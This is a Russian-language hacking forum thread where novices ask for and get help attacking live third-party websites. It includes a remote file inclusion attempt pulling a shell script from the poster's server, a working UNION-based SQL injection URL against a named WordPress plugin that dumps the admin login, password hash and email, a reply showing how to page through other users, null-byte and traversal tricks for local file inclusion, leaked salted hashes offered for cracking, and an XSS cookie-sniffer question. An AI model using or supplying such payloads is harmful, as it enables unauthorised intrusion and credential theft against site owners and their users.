Я вот нашел пхп инклуд вот здесь: http://www.dorodango-method.com/index.php а когда пробую залить шелл http://www.dorodango-method.com/index.php?page=http://mysite.ru/shell.php Шел отображается нормально, но файлы отображаются те которые у меня на сайте, и команды тоже выполняются относительно моего сайта.. В чем трабл?
Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?
Админку и пароли нашел токо ... У меня есть полный доступ к FTP одного сайта, я там покавырялся и нашел админку на сайте, путь выглядит так _www.site.ru/AdminSite/start.php , (вот скрин админки ) потом я там в FTP поискал пароли, и в той папке где админка AdminSite есть еще папка tc и там есть файл config.php открыл я этот .php файл вот сам код PHP: <? //Файл: config.php //Назначение: хранение настраиваемых переменных //=========================================== error_reporting(0); //Начальный хост (адрес начальной папки через HTTP, //например: "http://mysite.ru" или "http:/pupkin.ru/home") $host_1 = "http://site.ru".$HTTP_HOST; //Начальная директория $path_1 = $DOCUMENT_ROOT; //Имя пользоввателя (надо поменять!) $login_1 = "site"; //Пароль для входа в программу (надо поменять!) $pass_1 = "****"; //Количество файлов, доступных для загрузки на сервер //(четное число, например: 4, 6, 8 ...) $files_to_upload = 10; ?> Ну короче видите там где login и pass PHP: //Имя пользоввателя (надо поменять!) $login_1 = "site"; //Пароль для входа в программу (надо поменять!) $pass_1 = "****"; Ввел тут _www.site.ru/AdminSite/start.php как там в config.php логин и пароль и не заходит, менял в config.php логин и пароль токо не фига, может это вообще логин и пароль не от админки? Просто я решил если они находятся в одной папке что это оно) Спасибо за внимание Если не в том разделе сорри (но кажется тот) Токо не пинайте pls, если я не понятно обяснил напишите) просто хочу дойти до конца
не очень понятно зачем нужна админка если есть доступ к ftp а так вообще исходник start.php не судьба посмотреть?
start.php я смотрел там ничего нету), все мне говорят зачем нуна админка если есть доступ к фтп, ) Ответ: просто для себя хочу узнать) новые знания пригодятся)
Я первый раз занимаюсь SQL инекцией Вот подскажите это SQL инекция или нет? По моему да, токо хочу узнать на 100% HTML: http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php? id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email), 3,4,5,6%20from%20wp_users-- и там вот это потом написано Edit event admin:cd59cc41aa03d53c9336522d40ee4339:[email protected] cd59cc41aa03d53c9336522d40ee4339 это кажется MD5, если я не ошибаюсь) Это моя первая тема про SQL так что не пинайте) Спасибо за внимание
CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--
Спасибо что подсказал, наконец то сбылась моя мечта, я так рад ппц как) давно хотел узнать хотел сделать SQL инекцию, ааа ништяк) Терь моно в раздел SQL инекций добавлять)
А вот это нуно рашифровать cd59cc41aa03d53c9336522d40ee4339 и я получу пароль от админки? Или как?) Повторяю я новичок в этом деле
у меня такая ситуация: index.php?d=files&p=../index инклудится индекс. Видно, что добавляется .php в конец. index.php?d=files&p=../index.php%00 index.php?d=files&p=../index.php? index.php?d=files&p=../index.php// не прокатывает! Ошибку выдёт. Там Винда стоит. Есть ли шанс приишклудить файл с другим расширением, отличным от php?
скорее всего нет, ибо magic_quotes или просто фильр стоит, попробуй объявить переменную через куки или постом, хотя навряд ли прокатит
и выводится вот такой вид хешёй немогу понять что это именно мд5 или всё таки соль? Weinstein:425207c6e60ffa47065702619d9a8e76:aa:[email protected] Fisher:6ab6348c5cb2b47c1afdb254d23f6717:f2:[email protected]
Сбруть этот: 72baa9d520b127dd4ab03ff904cc1959:e5 и поймешь =) хотя опять же 100% уверенности всё же дать не могу
Может кто-нибудь все-таки подскажет: Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?
